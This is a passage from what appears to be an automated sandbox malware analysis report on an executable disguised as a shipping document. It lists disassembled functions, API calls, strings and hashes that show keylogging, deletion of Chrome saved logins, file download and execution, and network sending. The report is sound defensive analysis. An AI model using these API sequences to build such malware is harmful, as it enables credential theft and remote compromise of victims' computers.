                                                      • Opcode ID: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                      • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                      • Opcode Fuzzy Hash: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                      • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                      Function 00418C69 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                      • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                        • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Find$CreateFirstNext
                                                      • String ID: @CG$XCG$`HG$`HG$>G
                                                      • API String ID: 341183262-3780268858
                                                      • Opcode ID: 370f4d1bb48917f4102406aff739b7f4752134e9ba6bc41bde7cf39fc8db8d8c
                                                      • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                      • Opcode Fuzzy Hash: 370f4d1bb48917f4102406aff739b7f4752134e9ba6bc41bde7cf39fc8db8d8c
                                                      • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                      Function 004099E4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                      • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                      • GetLastError.KERNEL32 ref: 00409A1B
                                                        • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                      • TranslateMessage.USER32(?), ref: 00409A7A
                                                      • DispatchMessageA.USER32(?), ref: 00409A85
                                                      Strings
                                                      • Keylogger initialization failure: error , xrefs: 00409A32
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                      • String ID: Keylogger initialization failure: error
                                                      • API String ID: 3219506041-952744263
                                                      • Opcode ID: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                      • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                      • Opcode Fuzzy Hash: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                      • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                      Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressCloseCreateLibraryLoadProcsend
                                                      • String ID: SHDeleteKeyW$Shlwapi.dll
                                                      • API String ID: 2127411465-314212984
                                                      • Opcode ID: 4bfa0ab92cfe4c7e273a593f9c438f6144fcaff52e32c91ef8c2f101195a9e69
                                                      • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                      • Opcode Fuzzy Hash: 4bfa0ab92cfe4c7e273a593f9c438f6144fcaff52e32c91ef8c2f101195a9e69
                                                      • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                      Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                        • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                        • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                      • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                      • ExitProcess.KERNEL32 ref: 0040E672
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseExitOpenProcessQuerySleepValue
                                                      • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                      • API String ID: 2281282204-3981147832
                                                      • Opcode ID: e7420bd81adcf7ecaeb63c441a7eb2a496d40f418d65372005f5d4e07d0bafb2
                                                      • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                      • Opcode Fuzzy Hash: e7420bd81adcf7ecaeb63c441a7eb2a496d40f418d65372005f5d4e07d0bafb2
                                                      • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                      Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                      • GetLastError.KERNEL32 ref: 0040B261
                                                      Strings
                                                      • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                      • UserProfile, xrefs: 0040B227
                                                      • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                      • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteErrorFileLast
                                                      • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                      • API String ID: 2018770650-1062637481
                                                      • Opcode ID: b5e309dbdaf0aeabe7af2cd1639cb477138ee585283f82b93ad88acdd4edf375
                                                      • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                      • Opcode Fuzzy Hash: b5e309dbdaf0aeabe7af2cd1639cb477138ee585283f82b93ad88acdd4edf375
                                                      • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                      Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                      • GetLastError.KERNEL32 ref: 00416B02
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                      • String ID: SeShutdownPrivilege
                                                      • API String ID: 3534403312-3733053543
                                                      • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                      • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                      • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                      • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                      Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 004089AE
                                                        • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                        • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                        • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                        • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                        • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                        • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                        • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                      • String ID:
                                                      • API String ID: 4043647387-0
                                                      • Opcode ID: 09a69e0303e81d48d1e7444200da9c76687e86ed7c9a89389c8c98f32268c2c3
                                                      • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                      • Opcode Fuzzy Hash: 09a69e0303e81d48d1e7444200da9c76687e86ed7c9a89389c8c98f32268c2c3
                                                      • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                      Function 00419BC4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Service$CloseHandle$Open$ManagerStart
                                                      • String ID:
                                                      • API String ID: 276877138-0
                                                      • Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                      • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                      • Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                      • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                      Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                        • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                        • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                        • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                        • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                      • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                      • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                      • String ID: PowrProf.dll$SetSuspendState
                                                      • API String ID: 1589313981-1420736420
                                                      • Opcode ID: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                      • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                      • Opcode Fuzzy Hash: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                      • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                      Function 004511E3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                      • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: ACP$OCP
                                                      • API String ID: 2299586839-711371036
                                                      • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                      • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                      • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                      • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                      Function 0041A63F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                      • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                      • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                      • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Resource$FindLoadLockSizeof
                                                      • String ID: SETTINGS
                                                      • API String ID: 3473537107-594951305
                                                      • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                      • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                      • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                      • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                      Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 00407A91
                                                      • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstH_prologNext
                                                      • String ID:
                                                      • API String ID: 1157919129-0
                                                      • Opcode ID: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                      • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                      • Opcode Fuzzy Hash: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                      • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                      Function 0044800F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                      • _free.LIBCMT ref: 00448067
                                                        • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                        • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                      • _free.LIBCMT ref: 00448233
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                      • String ID:
                                                      • API String ID: 1286116820-0
                                                      • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                      • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                      • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                      • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                      Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                      Strings
                                                      • open, xrefs: 0040622E
                                                      • C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, xrefs: 0040627F, 004063A7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DownloadExecuteFileShell
                                                      • String ID: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe$open
                                                      • API String ID: 2825088817-288794478
                                                      • Opcode ID: d856352b29c500f65ac61f264686a0ac45c8e93dcc938b66659ffa0f0ca1f413
                                                      • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                      • Opcode Fuzzy Hash: d856352b29c500f65ac61f264686a0ac45c8e93dcc938b66659ffa0f0ca1f413
                                                      • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                      Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileFind$FirstNextsend
                                                      • String ID: x@G$x@G
                                                      • API String ID: 4113138495-3390264752
                                                      • Opcode ID: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                      • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                      • Opcode Fuzzy Hash: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                      • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                      Function 0041BB77 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                        • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                        • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                        • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCreateInfoParametersSystemValue
                                                      • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                      • API String ID: 4127273184-3576401099
                                                      • Opcode ID: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                      • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                      • Opcode Fuzzy Hash: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                      • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                      Function 00450A7F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                        • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                      • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                      • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
